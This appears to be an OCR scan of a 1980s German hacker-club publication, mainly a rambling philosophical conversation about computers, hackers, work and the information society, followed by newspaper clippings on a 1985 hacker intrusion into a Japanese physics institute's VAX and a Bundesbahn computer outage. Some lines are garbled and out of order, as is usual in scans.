senveranstaltungen oder von Massengefühi, 
ist leider Gottes Fußball, oder Olympia-Eröff¬ 
nung, war nicht schlecht. 

p: Wieso leider Gottes? Fu ßball ist auch so eine 
Sache wie Computer, die alle Menschen aus 
verschiedenen - oft männlichen Geschlechts - 
ideologischen und philosophischen Bereichen 
verbindet. 



Säzzer-Quiz: 

Wieviel Prozent des gedruckten Textes sind von Eva gesprochen worden? 

(Zur Erinnerung: Am Gespräch haben zwei Männer und eine Frau teilgenommen.) 

O 33% (Quote) O 5% 0 1% O 5%o 

Die Person, die die falsche Lösung bis gestern an den Chaos Computer Club einsendet, gewinnt 
eine Jahresabonnement einer feministischen Zeitschrift. ,_ 






i 


p; Wieso leiderGottes? Fußball ist auch so eine 
Sache wie Computer, die alle Menschen aus 
verschiedenen-oft männlichen Geschlechts- 
ideologischen und philosophischen Bereichen 
verbindet. 

m: Es geht jetzt um die Synchronisation von 
Gefühlen. Um Code. Um Sprache. Sozialer 
Code nenne ich jetzt eine Sprache auf einem 
anderen. . . 

p:.. .Das sind ja auch Gegenbilder, Fußballund 
Computer. Auf der einen Seite hast du ein 
Massenzeremoniell. Auf der anderen Seite hast 
du mit dem Computer - ich hab das hier noch 
unterstrichen durch meine Pharaonen am 
Schreibtisch, und balinesische Tempeldämo¬ 
nen -, dann seh ich manchmal einen Tischaltar 
vor mir stehen. Von der Form her, und von dem 
her, was ich daran tue. Ich vollziehe mein täg¬ 
liches Ritual an diesem kleinen Hausaltar. Das 
ist wiedermal eines von diesen vielen Modellen, 
die du überden Computer denken kannst. Da 
kann ich z.B. auch ein Bild machen, wenn ich 
sage: Ich kann mich manchmal in der Vorstel¬ 
lung in Merlin, den Magier verwandeln. Auch 
bloß mit einer gewissen kleinen Formverän¬ 
derung im Design des Instrumentariums. Statt 
der Kristallkugel steht da der Bildschirm. 

m: Das ist jetzt alles noch im Bereich der Un¬ 
terhaltung. 

p: Nein, da kommen tatsächlich verbindliche 
Informationen raus. Dinge, die ich über mich 
selbst und über die Welt erkennen kann. 

m: Das find ich jetzt interessant. Was sind 
“verbindliche Informationen“? 

p: Ich habvorhindiesesganzplumpe Modell mit 
Information und Unterhaltung gemacht. Und 
verbindliche Informationen, das sind für mich 
die, auf die ich reagiere und zwar mit meinem 
Gefühl. Als erstes. Das ist sozusagen die erste 
Anzeige, wenn sich da im Gefühl irgendwas tut, 
dann wird eine Information interessant. Dann 
fang ich an, im Kopf nochmal zu überprüfen, ob 
die für mich verbindlich sein kann oder ist. Dann 
treffe ich die Entscheidung. Alles andere geht 
nur durch. Durchlauferhitzer. Das ist Unter¬ 
haltung. Vorne rein, hinten raus. Da bleibt na¬ 
türlich manches hängen, das mischt sich. 

m: Ja, da bleibt einiges hängen. Es ist halt die 
Frage, was hängenbleibt. Jetzt nicht negativ 
gewertet. 

p: Muster. Muster bleiben hängen. Das ist z.B. 
was, was du am Computer auch sehr gut lernst: 


Muster zu erkennen. Daß das eigentlich eine 
wahnsinnig interessante Sache ist. Ganz wert¬ 
frei: Muster und Strukturen siehst du, wo du 
vorher noch nichts gesehen hast. Und kannst 
dadurch bestimmte Dinge wieder besser in die 
Hand nehmen, besser denken oder machen 

m: Ich will jetzt vom Computer wieder wea- 
kommen. Ich find diese Geschichte, immer wie¬ 
der auf den Computer, nicht ganz so wichtig 

p: Du bist aberauch seiberschuld, du hast mich 
jetzt so angekurbelt. Da fallen mir dauernd 
irgendwelche Sachen ein. 

m: Ich will das auch nicht negativ sehen, ich 
meine einfach, daß es um die Frage geht in 
unserem Brainstorming, Computer als Modell 
als bewußtseinserweiternde Geschichte dip 
hab ich hierauch Psycho-Hacking genannt dip 
Feuer-Geschichte, andererseits die Qo 
schichte mit der Hand, und dann auch ModellP 
durchprobieren, die man eigentlich mit Men 
sehen auch machen “könnte“. Und so praktisrh 
die ganze Geschichte des Computers als men 
Schliches Testprogramm machen, wieso nioht 
mit Menschen, wie du auch. . . ^ 



p: Weißt du, was ich dir sage: Du kannst e.. u 
einen negativen Aspekt daraus machen wo ” 
du sagst: Wieso nicht mit Menschen? DercS^'^ 
puter hat eine Eigenschaft, die man ihm sch ' 


















gut anrechnen kann: Er ist unendlich tolerant. 
Du kannst einen Fehler tausendmal hinterein¬ 
ander machen, er wird dich mit unendlichem 
Gleichmut immer weiter deinen Blödsinn ma¬ 
chen lassen, so lange, bis du’s vielleicht selber. 

. . Er macht dich drauf aufmerksam im Ex¬ 
tremfall, daß du einen Fehler gemacht hast, er 
gibt dir eine Zustandsmeldung.. . 

m: Es geht ja nicht um Fehler, um Technik. Es 
geht um Philosophie. Du kannst grundsätzlich 
jede Situation durchsimulieren. Fast jede. 
Theoretisch kannst du Auschwitz nachsimu¬ 
lieren. Gibt’s ja schon Computergames. 

p: Das ist nicht, was ich unter Simulation ver¬ 
stehe. 

m: Das ist reine Simulation. Ich treibe es jetzt ein 
Stück weiter, ich gehe auf die Grasmuck— 
Theorie zurück: Arbeit als Philosophie ist in der 
Dekadenz. Arbeit als Identifikation existiert 
kaum noch, es sei denn, es hat direkt mit 
Unterhaltung zu tun. Die Leute gehen im 
Westen doch den Weg des geringsten Wider¬ 
standes, d.h., die Werte einer Arbeit werden mit 
Unterhaltung oder einer Lebensqualität gleich¬ 
gesetzt, ob es jetzt Geld ist oder... 
p:.. .oder mit Forschung. Ich mu ß leider schon 
wiederden Computer erwähnen. Und zwar, wir 
haben so einen Zustand, in dem du eigentlich 
meinen könntest: die Welt ist entdeckt. Und es 
geht nur noch um ein paar unwesentliche De¬ 
tails, z.B. darum, was eine halbe Sekunde vor 
dem ausgebrochenen Urknall passiert ist. 
genau am Anfang. Was ab der halben Sekunde 
danach passiert ist, wissen die theoretischen 
Physiker schon. Du kannst nicht mehr, so wie 
im 18. oder 19. Jahrhundert noch das Allge¬ 
meinwissen deiner Zeit als ein Mann überblic¬ 
ken. Man wird so verunsichert. Du wirst klein¬ 
gemacht durch das Gefühl: du kannst als Ein¬ 
zelperson gar nichts mehr entdecken, nichts 
mehr erforschen. Du brauchst mindestens 
einen Teilchenbeschleuniger, Großtechnolo¬ 
gie, Kernresonanzspektrometer, Computerto¬ 
mographen, diese ganzen teuren, riesigen Din¬ 
ger. Oder Spezialistenteams, die sich vorher 
schon 20 Jahre auf der Uni das Hirn ausge¬ 
rissen haben. So. Und dann kommt plötzlich 
genau ausdem Sektorso eine kleine Maschine, 
der Computer, der in einem Jahrzehnt eine 
Leistungsfähigkeit erreicht, sodaß du eben, 
was grade noch in einem Rechenzentrum an 
Leistung rumstand vordreivier Jahren, plötzlich 
auf deinem Schreibtisch steht. Und du hast die 
Möglichkeit, damit zu forschen, zu arbeiten, als 
Einzelner, als privater Mann.. 

m: Gut, aber es interessiert niemanden mehr 


außer dir selber, diese Forschung. 

p: Das stimmt überhaupt nicht. Da muß ich 
bitteschön auf die Hacker hinweisen, als klei¬ 
nes Beispiel. . . 

m: Du kannst die Hacker als die ewige Reak¬ 
tionsgeschichte, Kontrollinstanz, nicht immer 
wieder als Inhalt aufführen. 

p: Das ist ein Inhalt, der ist akut. Es gibt be¬ 
stimmte Inhalte, die sind zu bestimmten Zeiten 
der Geschichte akut, da. Dann verschwinden 
sie wieder und andere sind dran. 

m: Die Hacker sind allerhöchstens eine Avant¬ 
garde und eine reaktive Kontrollinstanz, die 
inhaltlich an einer Philosophie nicht mitarbei- 
ten, sondern nur, indem sie Grenzbereiche 
schaffen, wo gewisse Machtwerte infrage ge¬ 
stellt werden, interessant sind. Sie sind Friktion, 
sie pushen etwas. Sie pushen gewisse Macht¬ 
kompetenzen, die einerseits fast vollkommen 
unumschränkt von gewissen Leuten gemacht 
werden, ob jetzt Information, Wissenschaft 
oder andere, und pieksen da mal rein. Und dann 
perfektioniert sich die Geschichte. Das ist 
nichts anderes, zurzeit. Es ist keine Vision bei 
diesen Leuten da, es ist nur Unterhaltung, oder 
computergamemäßig Forschung zu machen. 
Probieren, tüfteln, reagieren, Squash spielen, 
sonst nichts. An dem Punkt sind wir jetzt schon 
lange angelangt. Und du kannst nicht immer 
wieder die Maschine.. . und das passiert, und 
das passiert. Arbeit, sicher, Arbeit ist alles. Aber 
es gibt "Beschäftigung“ und “Arbeit“, und da ist 
ein Unterschied, Und das ist Beschäftigung, 
was diese Leute machen. Inhaltlich leben sie 
vielleicht nach drei,vier Jahren davon, unab¬ 
sichtlich, als riesige Software-Spezialisten 
oder Hardware-Spezialisten, engagiert in 
einem Bereich, wo sie gar nicht wissen, wo sie 
sind. Wo sie sich nie 'mit identifiziert haben, 
außer mit einer Technikgeilheit. Oder eben die¬ 
sen zwei Gründen. Und was anderes nicht. 

p: Da triffst du jetzt wiedereinen wunden Punkt. 
Da bin ich mit meiner Arbeitsrichtung auf einer 
Insel, weil das tatsächlich im Augenblick ein 
aktuelles Problemteiichen ist. Weil viele von 
den Hackern so in ein Alter kommen, wo sie an 
Existenzgründung denken... 

m:.. .denken müssen... 

p: . . .Ja, und im Augenblick sich die merk¬ 
würdigsten Dinge abspielen. Es entstehen 
Konkurrenzen zwischen Leuten, die vorher 
traulich im Schulterschluß mit Selbstverständ¬ 
lichkeit ihren Spaß gehabt haben, gearbeitet 


I 



haben qelorscht haben, ohne daß von Geld 
auch nu?die Rede war. Und 
ein paar von ihnen mit einer sehr ah^nlichen Idee 
zwei Läden aut, Firma. Plötzlich ist da em 
gewisser Frost zu bemerken, Kommunika¬ 
tionssperre. Dinge werden vertraulich behan¬ 
delt. Da schleicht die Paranoia herum. 

m- Das ist ja wieder; Da wird eine Geschichte, 
die mal Spaß war, zu Geld und dam wirds 
komisch für die Leute. Und da gibt es überhaupt 
keine inhaltliche Diskussion, wofür, für was, 
überhaupt nichts. Vorbei. 

p; Das geht ja. Ich hab ja auch das, was mir 
Spaß macht, zu meinem Beruf gemacht. Ich bin 
Berufskind - in sorgfältiger Unterscheidung zu 
dem Begriff Berufsjugendlicher.. 


hab’ ich nur ein ganz schwaches Verhältnis 
dazu. Ich bin froh, wenn ich eine Freundin hab, 
die meine Kassa verwaltet, so eine kleine Yoko 
Ono. 

m: Es geht jetzt nicht um Geld, sondern was 
sich gesellschaftlich dann ändert. 

p- Ja, ich mach mir auch in der Folge um die 
weiteren Geldstrukturen keine Gedanken. 

m: Es geht jetzt nicht um die Geldstrukturen, 
sondern darum, daß die Informationsgesell¬ 
schaft mit sich bringt, daß eine gewisse.. . 

p; Das wird ja auch vereinheitlicht. Das war ja 
eines der ersten Dinge, die digitalisiert worden 
sind. Geld fließt doch auch nur noch in Form von 
Datenströmen. 


m: 


. .Berufsjugendlicher, Berufsromantiker. 


p; Nein, ich bin KEIN Berufsjugendlicher. Ich bin 
Berufskind. Ich kann es mir endlich erlauben, in 
Ruhe fertigzuspielen. Es gibt einen schonen 
Satz von Nietzsche, der hat mal gesagt. Man 

muß als Mann den Ernst wiederfinden, den man 

als Kind beim Spielen hatte. Das schreib ich mir 
ins Wappen - falls ich mir mal eines zulegen 

sollte. 

m; Ich gehe trotzdem weiter. Seit einer Stunde 
will ich diesen Satz zuende sagen. 

p: Du bist immer noch nicht dazu Gekommen, 
die Grasmuck-Theorie auszufuhren. Aber ich 
bin immer noch mit dabei, Mike. 

m: Ja, gut. Und diese Geschichte von - ich 
wiederhole es jetzt - daß 1/5 der 
4/5 der anderen durchziehen konnte. VVas heißt 
das jetzt materiell gesehen? Daß in einer Ge¬ 
sellschaft, in der 1/5 arbeitet, em moneta es 
System... Stell dir vor, 1/5 der Leute, die alles 

produziert, zahlt 4/5 der 
nicht arbeiten-ich sage nicht, daß sie sich nicht 
beschäftigen -, also, die nicht arlDeiten in die¬ 
sem Sinne, zahlen denen Material, damit sie 
sich was kaufen können, was essen. . . v^e 
funktioniert das? Wie wird das entschieden. 
Was ändert sich gesellschaftlich, wen^n dieses 
monetäre System, das bisher jahrhunc^rtelang 
funktioniert hat, nicht mehr ^^'stiert. Oder. Es 
ist doch vollkommen abstrus oder dekadent, 
wenn 1/5 der Leute, sozialgeldmäßig namlich, 
4/5 der Leute bezahlt, damit sie ihnen dem 1/5, 
was abkaufen, egal ob man da ein Turnussy¬ 
stem oder irgendwas anderes macht. 

D-Geldist eine Sache, überdie mach ich mirviel 

zu wenig Gedanken. Da hast du eh recht. Da 


m; Ja, aber das ist vielleicht umverteilbar. . . 

p: . . .und die Datenströme erreichen zwi¬ 
schendurch Realitätsgrade bis hin zu dem Bör¬ 
senkollaps. Das ist ja auch eines von den 
neuen, ganz großen Videospielen. Die inter¬ 
nationale Börse. 

m: Das ist auch ein Videospiel, das sich als 
Videospiel degradieren wird. Was heißt: In Zu¬ 
kunft werden gewisse Informationen mit der 
gleichen Qualität, oder mit dem gleichen Wert, 
behandelt werden wie Geld. Und das werden 
irgendwelche wichtigen Informationen sein, 
von.. . 

p: Ja, eine Hyper-Abstraktion. Ist ja Geld schon 
eine Abstraktion von realem Wert. Ob du jetzt 
ins Spielcasino gehst und einen Jeton kriegst 
der eine zweite Abstraktion von Wert ist, oder 
ob du digitales Geld nimmst, oder Banküber¬ 
weisungen, wo nur noch Ziffern hinundherflut- 
schen, das ist schnurz. Das ist dasselbe. 

m: Ich meine jetzt, der letzte Imperialismus - 
was ich meinte mit dem Westen. Wir zahlen 
eine Monopolisierung des Informationswertes 
Es wird ein Monopol. Nur wird es dann sehr- 
lustig, weil das Gremium aus einer Demokratie 
von Werten bestehen wird, die einfach so per¬ 
vers und so krank und so durcheinander sein 
werden, daß es wieder als Übergangsphase - 
ich schätze so in 20,30 Jahren - eine Mischung 
von Grünen bis Linksradikalen bis Porno-- 
Leuten bis Politik... - wird alles gemischt sein 
Und da wird ein Cocktail zusammengestellt vori 
Informationen, was was wert ist, und es wird - 
deine Einblendung von lnformations-Naviga_ 
toren -, es werden Leute sehr gut bezahlt 
werden, daß sie die richtigen Informationen an 






den richtigen Ort bringen. Und das werden die gewisse Leute. . . 

Leute sein, die gewisse Geschichten kontrol¬ 
lieren werden. p:.. .wie Fernsehprogramm. . . 


p: Dieser Beruf vom Navigator, der ist ja in der 
Vorstellung auch schon mit einem gewissen 
Optimismus ausgestattet. Weil, es gibt eine 
andere Perspektive, wenn du dir die Entwick¬ 
lungen in den Datenbanken momentan an¬ 
schaust: Da ist immer die Verheißung, das 
Wissen der Menschheit steht uns zu Verfü¬ 
gung. Die Realität ist aber das exakte Gegen¬ 
teil. D.h. es wird das Wissen der Menschheit 
vergraben und versteckt, halt nicht mehr in 
Löchern, Höhlen und Truhen oder lateinischen 
Übersetzungen, sondern in Datenbanken. Du 
hast eine ganz klare ökonomische Barriere, d.h. 
das Monatsabonnement für eine Datenbank, 
sagen wir über die geologische Struktur Un¬ 
teritaliens, geht im Schnitt bei 100 Mark im 
Monat los, aufwärts. Das sind alles Fachda¬ 
tenbanken. hunderte. Etwas ungeregeltere und 
freie Formen von Informationsaufnahme wie 
z.B. durch ein Buch schlendern oder durch¬ 
blättern, schmökern, kreuz&querlesen usw., 
das fällt schon mal weg. Wieder eine Verrohung 
der Informationsaufnahme. Und dann gibts 
noch die Sperre: du kommst an Datenbaken 
nicht ran, wenn du das Knowhow nicht hast - 
da käme dann wieder der Navigator zum Ein¬ 
satz -, wenn der überhaupt noch zum Einsatz 
kommt. Weil: Wenn das so weitergeht, wenn ich 
jetzt mal ausnahmsweise auch schwarz malen 
darf, kann es durchaus sein - wenn du nicht 
mehr WEISST, was es zu wissen gibt, dann 
kanst du es auch nicht suchen und schon gar 
nicht finden. D.h., das Prinzip der humansiti- 
schen Bildung oder der klassischen Allge¬ 
meinbildung. .. 

m: Da wird es zwei Versionen geben. Entweder 
man nimmt, was kommt, oder es werden sich 


m: . . .fernsehprogrammäßig meinungsmäßig 
aufbauen, die sagen: Das und das ist wichtig. 
Aber ich glaube, daß noch ein anderer Punkt 
wichtig ist, rein von der Gesdellschaftsstruktur 
her, wenn man jetzt z.B. die BKA-Geschichte 
anguckt, diese total hilflosen Polizisten, und 
andererseits die total hilflosen Hacker. Und 
dann gibt’s Leute wie mich, oder andere Leute 
- ich werd’ von diesen Leuten schon ziemlich 
gut behandelt. Ob es jetzt die Hacker sind, oder 
die Musikszene, odervon gewissen Leuten aus 
der Kunstszene, einfach aus dem Grund, da ich 
jetzt schon in einem gewissen Sinn eine phi¬ 
losophische Navigator-Funktion habe. 

p: Klar, wir haben doch alle schon an deinem 
Mythos mitgearbeitet, Mike. Du hast eine Ver¬ 
pflichtung. 

m: Das ist schon klar, daß ich eine Verpflichtung 
hab’. Ich hab’ von Anfang an auch sehr bewu ßt 
gesehen, daß ich diese Verpflichtung hab’ und 
auch haben will. Jetzt natürlich: die Gefahr ist, 
daß ich irgendwann gedacht hab, ich helfe 
dabei. Aber ich hab’ mich nie damit abfinden 
können und fühl mich sehr schlecht dabei, daß 
jetzt die Leute sich drauf verlassen: Der wird 
das schon für uns machen, und selber gar 
nichts machen. 

p: Da bist du selber mal mit dem Stellvertre¬ 
terproblem konfrontiert. 

m: Absolut. Das steht jetzt nicht zur Diskussion. 
Was zur Diskussion steht, ist, daß du vom 
gesellschaftlichen Status, wenn ich den Gras¬ 
muck nehme, wie er im Institut für Mathematik 



AND BACK AT THE PICTOS% ^ ‘ i : 
. HOME.,. 


WE INTERRUPT DIALINQ 
FOR DOLLARS FOR THE 
FOLLOWING LIVE NEWS 
BULLETIN... FROM THE 
SPREADING RIOT AT THE 
ASBESTOS FACTORYI 




vL 












und Datenforschung z.B. eine Aufgabe gehabt 
hat das war vor sieben Jahren; er mußte das 
ganze Institut-das sind schätzungsweise 1200 
Leute, Angestellte, ist staa^ich ist For¬ 
schungsabteilung hoch hundert. Nahe Bonn, 
so 20 km von Bonn er war dafür verant¬ 
wortlich, alles auf den neuesten Stand In¬ 
formationstechnik umzustellen und gleichze^^ 

- stell dir das mal vor; eine Person ist dazu da, 
die Orientierung der neuen 

gramme zu bestimmen. Dieser Mensch hatte in 
seiner Arbeit die Funktion und die Tätigkeit 
besLimmt. Kannste dir vorstellen, wie die aus¬ 
geflippt sind. .. 

p;. . .der Muezzin, der Vordenker. 

m‘ Viel, viel einfacher. Viel diskreter. Er dutite 

- wieder auf einer ganz anderen Ebene, näm¬ 
lich wo die Lösungen wieder falsch gesicht 
werden - als Betriebspsychiater, dume er j^n- 
qehen, beim Direktor - hatte einen Sta us über 
dem Direktor - in Bücherhallen gucken, ins 
Programm reingucken, bis hin zur 

mer er durfte überall hin und stand abstrakt 
gesehen über allen. Ein Psychiater >st das 
auch. Und immer mehr Leute verlassen sich auf 
solche Leute und behandeln die Leute auch als. 


m; Das ist auch meine Neigung. 

p; Nicht nur in der Mikroelektronik oder in der 
Computer-Umgebung. Es ist die Zeit, du 
kannst dir heutzutage, eigentlich viel leichter- 
und zwar grade weil es schwerer geworden ist 
auf dem konventionellen Sektor - neue Berufe 
erfinden. 

m- Ja, aber ohne daß es auf dem Daniel Dü¬ 
sentrieb-Trip landet, verstehste. Daß z.B. nicht 

die Europäer mit der neuen Informationsge¬ 
sellschaft diesen neuen Donald Duck-Tick krie¬ 
gen und sagen; Es ist eh nix wichtig, es ist geil 
und es bringt Kohle und einen Komplex kriegen, 
einen bürgerlichen Komplex.. 

p; Das ist Mickymaus, bitteschön. Micky ist der 
Spießer. 

m; Ja, aber die ganzen Micky-Berufe, die jetzt 
erfunden werden, wo die Leute nicht stolz drauf 
sein werden, die dann zurückknallen; Ich möcht 
jetzt Schuhmacher werden, oder ich möcht 
Steinmetz werden. Das wird nämlich kommen. 
Die große Petra in Berlin, ja, hat zehn Jahre 
Szene gemacht, und Drogen und alles, und ist 
jetzt schon 37, und jetzt will sie in Bayern in eine 
Steinmetzlehre gehen. 


n: Als ich in Fabriken gearbeitet hab’, das waren 
immer die Leute, die mit der Stoppuhr neben 
dem Scheißhaus gestanden sind, oder neben 
dem Kaffeeautomaten. Die Rationalisierungs- 
fachleute. 


m" Ja, aberdas ist jetzteine andere Geschichte. 
Das ist ja nicht eine negative oder eine Push- 
Geschichte, sondern eine konstruktive Ge¬ 
schichte. Positiv gesehen. 


p: Mücke weiß selber, daß er Arbeitsplätze 
wegrationalisiert. 


m: Der Mücke weiß das. Aber der Mücke weiß 
z.B. auch, daß die... das war auch eine lange 
Diskussion; daß eine Gesellschaft ohne Arbeit, 
und das ist seine These, theoretisch vor dem 
Problem steht, neue Inhalte zu schaffen. 


p; Richtig. Den Arbeits-Begriff neu zu bestim¬ 
men. 


m- Jetzt ist z.B. die erste Geschichte; Verkür¬ 
zung der Arbeitszeit hat nicht mehr Freiheit 
geschaffen für die Leute, sondern eher neue 
Probleme. 

p; Du kannst z.B. neue Berufe erfinden. 


p; Ach, das ist wie bei einem Freund von mir. 
Der hat sich ein halbes Jahr lang, weil er mit 
einer Maus aus einer Werbeagentur zusam¬ 
men war, die 5000 Mark im Monat verdient hat 
mir ihrzusammen jeden Tag einen Viertelmeter 
Koks reingesaugt, kriegt nach einem halben 
Jahr einen Nachmittag lang eine halbseitige 
Lähmung und trinkt dann zwei Wochen lang nur 
Kräutertee. Das ist so das Prinzip. 

m; Ja, aber jetzt geht es darum, daß z.B. da 
überhaupt keine Beständigkeit, keine Vision 
und kein Stolz drin ist. Es muß, entweder von 
der Tradition her, dieser Fake “Traditionsge¬ 
danke“, wo die inhaltlichen Gedanken flutschen 
gehen, weil das ganze nur noch eine De¬ 
sign-Geschichte ist-die Family ist Design, die 
ganzen 70er-Modegeschichten sind alles nur 
Designgeschichten, wo alle Inhalte, Motivatio¬ 
nen oder Ursachen flöten gegangen sind.. 

p; Ich muß mal mit dir über meinen Roman 

reden. Weilda ist einiges von dem drin, worüber 

wir im Augenblick reden. Auf der einen Seite 
das Monumentale und Mythische. Also so eine 
Größe. Eine Visen. Daß du was Großes willst 
m- Neinneinnein. Monumental und visionär, laß 
mich das mal ausformulieren. Gesellschaft oh¬ 
ne Arbeit. Es geht um das Bewußtsein, daß das 
Monumentale, Mythische natürlich ein Problem 





ist in einer bewu ßten Gesellschaft. Das Dogma 
oder das Mysterium, was in jeder Religion ist, 
ist bis jetzt nicht aufgeklärt worden. Es ist nie 
voll aufgedeckt worden, wie einfach im Grunde 
genommen die Geschichte ist. Das sind Ten¬ 
denzen im Zen-Buddhismus gewesen, das 
Nichts oder weißgottwas... im anderen Extrem 
jetzt Tendenzen da waren, die Einfachheit sol¬ 
cher Geschichten zu demonstrieren, aus der, 
sagenwirmal: eine Harmonie des Lebens be¬ 
steht. Diese Geschichte ist verkleidet in Dog¬ 
men, in Gesetze gewesen, in gewisse Fixri¬ 
tuale, die in den Religionen stattgefunden hat, 
aber obwohl es natürlich vielen Leuten bewußt 
ist, daß in allen Religionen eigentlich der glei¬ 
che Kern drin ist. Und diese Geschichte ist jetzt 
in der unbewußten Phase des Verführtwerdens 
oder des GEführtwerdens in einem Ritual na¬ 
türlich vorbei, von der Technik. Und dieses 
GEführt oder VERführt, bis hin zu einem Über¬ 
leben der Mystik in der Sexualität in den letzten 
20 Jahren, wo der Begriff des Echten Ver¬ 
knalltseins ja auch formuliert ist. To fall into love, 
z.B. Man sagt ja nicht: I go into love. Fall into 
love. Das ist jaunglaublich, daß mirdas passiert 
ist. Die ganzen Spezialisationen. 

p: Darüber haben wir uns ja auch schon mal 
unterhalten. Das ist eine wichtige Erfahrung, 
die wir schon gemacht haben. Daß es den 
Unterschied gibt zwischen dem, was du be¬ 
schreibst: die romantische Liebe, die über 
einen kommt als Naturgewalt. Auf der anderen 
Seite die Erkenntnis, daß Liebe kein Gefühl ist, 
sondern eine Fähigkeit. 

m: Gut, richtig. Und daß diese Fähigkeit auch 
konstruiert und aufgebaut werden kann und 
nicht einfach eine Geschichte ist, die einem 
passiert wie: Ich bin von meiner Mutter über¬ 
rascht worden beim Wixen, und durch die Sen¬ 
sation beim Uberraschtwerden, des schlechten 
Gewissens, meingottwas, hab ich gezittert. Al¬ 
so die Verschmelzung in eine Ekstatik von 
Körper und Geist. Dieses Jetzt-Moment, das 
man ja kennt, von der Musik, von einer Schlä¬ 
gerei, auch Hack-Sessions. Dieses Fieber, wo 
der Zeitbegriff von Zukunft - Vergangenheit 
einfach aufgelöst wird, und der Moment ver¬ 
längert wird. Und das ist im Grunde genommen 
ein bewußtes Ritual. 

p: So hat Einstein mal die Relativitätstheorie 
beschrieben. Wie sich die Zeit unterschiedlich 
wahrnehmen läßt, wenn du eine Minute auf 
dem Schoß eines hübschen Mädchen sitzt, und 
wenn du eine Minute auf einer heißen Herd¬ 
platte sitzt. 

m: Und das ist z.B. diese Geschichte, wo ein 


vollkommen neues Bewußtsein erzeugt wer¬ 
den muß, wo man sagt: Ich verführe mich jetzt 
sofort freiwillig, jetzt, bewußt, sofort. Oder: 
Freut euch, sofort, freiwillig. 

p: Aberdas ist ehereine bedenkliche Richtung. 
Das ist so der Bildschirm als Spiegel des Nar¬ 
ziß, wo du eintauchst. 

m: Das ist geschädigt. Der ganze Symbolismus 
dieser Geschichten ist nur schädigend. Und da 
gibts einfach ein paar Negativbeispiele von 
Hare Krishnabis Sekten, die sagen: Freut euch 
sofort freiwillig, und dann krieg ich sofort einen 
schlechten Geschmack. Stimmt. Aber das Sy¬ 
stem ist richtig. Es geht darum, bewußt in Sa¬ 
chen reinzugehen, in Zukunft, in Rituale, wo ich 
nicht sage: Das hätt’ich nicht gedacht, pohl, ist 
mir das passiert, pohl, jeder Tag, es muß mir 
was passieren! Die Leute sind total gegen die 
Unsicherheit eines geregelten Tagesablaufs, 
sind aber von der Unterhaltung und von der 
Erlebnisqualität nurdarauf aus, mit Erlebnissen 
konfrontiert zu werden, die sie aufwühlen und 
die sie überhaupt nicht kontrollieren können, 
und die ihnen passieren. 

p: Bei uns hat sich wirklich das lineare Modell, 
das die Schriftkultur gebracht hat, so einge¬ 
prägt, an dieser Linie, an dieser endlosen Zeile 
geschriebenen, gesprochenen, gedachten, ge¬ 
lesenen Zeile entlangfahren kannst wie an 
einer Autobusoberleitung, und gar nicht mehr in 
der Lage bist, oder ein Unsicherheitsgefühl 
kriegst, daß du sozusagen deinen Sicher¬ 
heitsgurt auflöst, wenn du da rausgehst in einen 
nichtsprachlichen Bereich. Um aus dem Zeit¬ 
gefühl rauszugehen, mußt du aus der Sprache 
rausgehen. 

m: Und setzt sich dann liebervoreine Maschine 
und macht ein Game, statt mit Leuten sich 
hinzusteilen und zu sagen:. .. 

p: Da kannst du aber dein Zeitgefühl auch 
verändern. Worüber wir jetzt eh schon ein bi߬ 
chen geredet haben: Versuche, auf so Gleich¬ 
zeitigkeiten zu kommen. 

m: Und da sind wir wieder beim Code. Das 
meinte ich jetzt. Daß z.B. dersoziale Code darin 
besteht, nämlich in Zukunft, in einer Gesell¬ 
schaft, in der keiner mehr Arbeit hat, aber eine 
Beschäftigung hat, inhaltliche Geschichten zu 
schaffen, die gewisse Regeln unter den Leuten 
fördern, die aber bewußt sind. Wo jeder weiß: 
Ich verführe mich jetzt sofort freiwillig, zu dritt. 

Jetzt. Zack. 


s' 



^0^05^r Dienstag, 24. Februar 1987 

Hackei^ schädigten Japan 


Zum ersten Mal gelang es ausländischen 
Computer-Hackers, in einen mit gehei¬ 
men Fakten versehenen japanischen 
Computer einzudringen. Die aus West¬ 
deutschland stammenden Hackers knack¬ 
ten einen Vax 11.750, der zum Institut für 
Hochenergiephysik von Tsukuba gehört. 
Die Invasion begann im Mai 1985 und 
dauerte etwa einen Monat. Anfangs konn¬ 
ten die Hackers den Corhputer nur kurze 
Zeit anzapfen, mit der Zeit blieben sie 
aber sogar während Stunden mit ihm ver¬ 
bunden. Die Sache flog auf, als ein Wis¬ 
senschafter des Instituts bemerkte, dass 
mitten in der Nacht verdächtig viele Be¬ 
nutzer an den Computer angeschlossen 
waren. Bei der Untersuchung fand man, 
dass die Hackers einen Identitätscode be¬ 
nutzten, der von den japanischen Wissen- 


Thema Datenschutz; Computer-Freaks ha¬ 
ben den Rechner der TU Berlin geknackt 
oder sich dort jedenfalls Zugänge ver- 
schaift. Wäre das bei Ihnen und bei Ihrem 
System möglich - denkbar? 


Boedeii: Hacker kommen hier 
nicht rein. Wir haben sicherheitstech¬ 
nische und personelle Sicherheitssyste¬ 
me entwickelt, die das unmöglich ma¬ 
chen, und es wird auch .ständig daran 
gearbeitet, die alle noch zu verbessern. 


schaftem kaum je angewendet wurde. 
Deutsche Ausdrücke im Gespräch mit 
dem Computer führten die Japaner 
schliesslich auf einen Computer-Termi¬ 
nal, der zur Technischen Universität von 
West-Berlin gehört. Die Japaner vermu¬ 
ten aber, dass mindestens 20 Hackers ver¬ 
schiedener deutscher Universitäten wie 
Frankfurt, München und Hamburg zeit¬ 
weise ihren Computer benutzten. Auch 
Forscher vom Gern in Genf könnten den 
Japanern zufolge unter den Eindringlin¬ 
gen gewesen sein. Genau lässt sich dies 
jedoch nicht eruieren. Die Namen der 
Hackers sind jedenfalls nicht bekannt. 
Als die Japaner sie fragten, wer sie seien, 
antwortete einer mit «Donald Duck», ein 
anderer mit «Superman». («New Scien- 
tist»; 12. Februar, S. 25.) (TA) 



^ sonst in Bonn 


Computer-Störung bei der 
Bahn sorgte für Schlangen 

Lange Warteschlangen an den Bundes¬ 
bahn-Fahrkartenschaltern: In FranWurt 
und im Rhein-Main-Gebiet war am Mitt¬ 
woch keine Platzreservierung zu bekom¬ 
men; der Fahrkartenverkauf war eben¬ 
falls behindert, und verschiedene Fracht¬ 
kunden mußten nach Auskunft der Bun¬ 
desbahn bis zu 24 Stunden Verspätung in 
Kauf nehmen. Der Zentralcomputer in 
Frankfurt war ausgefallen. 

Am Montagabend hatte das Datenfern¬ 
übertragungsnetz der Bundesbahn zum 
ersten Mal seit 1982 gestreikt. Tickets 
mußten zum Teil per Hand ausgestellt 
werden. '' 

Acht Fachleute arbeiteten von Diens¬ 
